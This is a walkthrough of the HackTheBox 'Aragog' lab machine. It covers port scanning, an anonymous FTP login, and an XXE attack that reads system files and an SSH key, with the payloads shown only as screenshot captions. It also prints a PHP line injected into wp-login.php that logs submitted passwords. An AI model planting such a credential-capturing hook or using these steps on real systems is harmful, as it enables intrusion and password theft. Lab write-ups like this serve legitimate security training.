Aragog Box Writeup & Walkthrough – [HTB] – HackTheBox

This article shows how to hack the Aragog box and gain both user.txt and root.txt step by step based on Kali Linux and tools.

Aragog is a machine on the HackTheBox Platform.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article shows how to hack the Aragog box and get root permission.

Before attacking Aragog box, we first need to enumerate open ports. Execute the following command to run a nmap scan. The scan is able to identify open ports.

1
nmap -sS -Pn 10.10.10.78
ScanPorts
Ports Scan

We identify that there are 3 ports open.

  1. FTP service running on the port 21.
  2. SSH service running on the port 22.
  3. HTTP service running on the port 80.

Then, we enumerate HTTP service and check if we can find anything from the website.

Website Enumeration
Website Enumeration

We find that there is a PHP file (hosts.php). We now finish the initial enumeration, and we move to the next step.

We know that there is an FTP service. For FTP, there are few vulnerabilities, such as weak credential. First, let us attempt to log in the FTP service via anonymous user.

We use the following credential to log in the FTP service.

Credential

Username: ftp

Password: ftp

FTP Anonymous User Login
FTP Anonymous User Login

After logged into the FTP service, we obtain a TXT file, we are able to download this file by using “get” command.

We then check the content of the TXT file, it is an XML file, but we do not know how and where to use it yet.

Subnet Mask XML File
Subnet Mask XML File

Then, we move to HTTP service, open browser and navigate to the web application.

Observe that the web application displayed a message:

There are 4294967294 possible hosts for

Aragog Box Web Application
Aragog Box Web Application

After googled, we find that the number 4294967294 is related to subnet-mask. The TXT file is also related to subnet-mask. Therefore, I assume that we can submit malicious request to the endpoint (hosts.php) and the malicious request can be created based on the above TXT file (test.txt).

We open Burp and browser, navigate to the hosts.php page, intercept the “GET” HTTP request, and send it to repeater.

Endpoint GET Method Response
Endpoint GET Method Response

Then, we change it to “POST” method, and the post content is the TXT file’s content.

Endpoint POST Method Response
Endpoint POST Method Response

We find that the website returns a valid response, and calculates the possible hosts.

The POST content is XML format, therefore, the website maybe vulnerable to XXE vulnerability. Let’s create a payload and attempt to read /etc/passwd file.

XXE Payload Read /etc/passwd File
XXE Payload Read /etc/passwd File

For obtain user.txt, we just need to change the file location to user.txt file.

XXE Payload Read user.txt File
XXE Payload Read user.txt File

Now, we are going to obtain root.txt. For gaining root access, we have to do privilege escalation.

We first need to get a shell before performing privilege escalation. As we scanned before, SSH service is running on this server.

As you may know, SSH has two ways to login, one way is using credential, another way is using key, we can obtain the user’s SSH key by reading the local SSH key file (id_rsa).

XXE Payload Read id_rsa File
XXE Payload Read id_rsa File

We copy the key into the local Kali machine and use it to log into the target server.

SSH to Target Server
SSH to Target Server

Then we go to the web directory (/var/www/html).

Web Directory
Web Directory

There is a folder, which called “dev_wiki”. We visit it on our browser.

Aragog Dev Wiki Website
Aragog Dev Wiki Website

Based on the website, we know that “Cliff” user reset the website regularly and the website uses WordPress CMS. Therefore, if we can capture the user’s Username and Password. We may be able to log in as Cliff user or root user. We may be able to use the credential to log into the server as root user. (The user may reuse the password)

We then edit wp-login.php file, and add following content in the file.

1
file_put_contents('/var/www/html/login.req', file_get_contents('php://input') . PHP_EOL, FILE_APPEND);

After a few minutes, we successfully obtain the user’s credential.

Capture User Credential
Capture User Credential

We log in to the server again by using the above credential, and we log in successfully.

Gain root access
Gain root access

This box is not too difficult. I spent most of the time on the initial step (around 3 hours). I was thinking that it was code injection vulnerability, I attempted several payloads, but they did not work. After I identified it was XXE, everything was easy.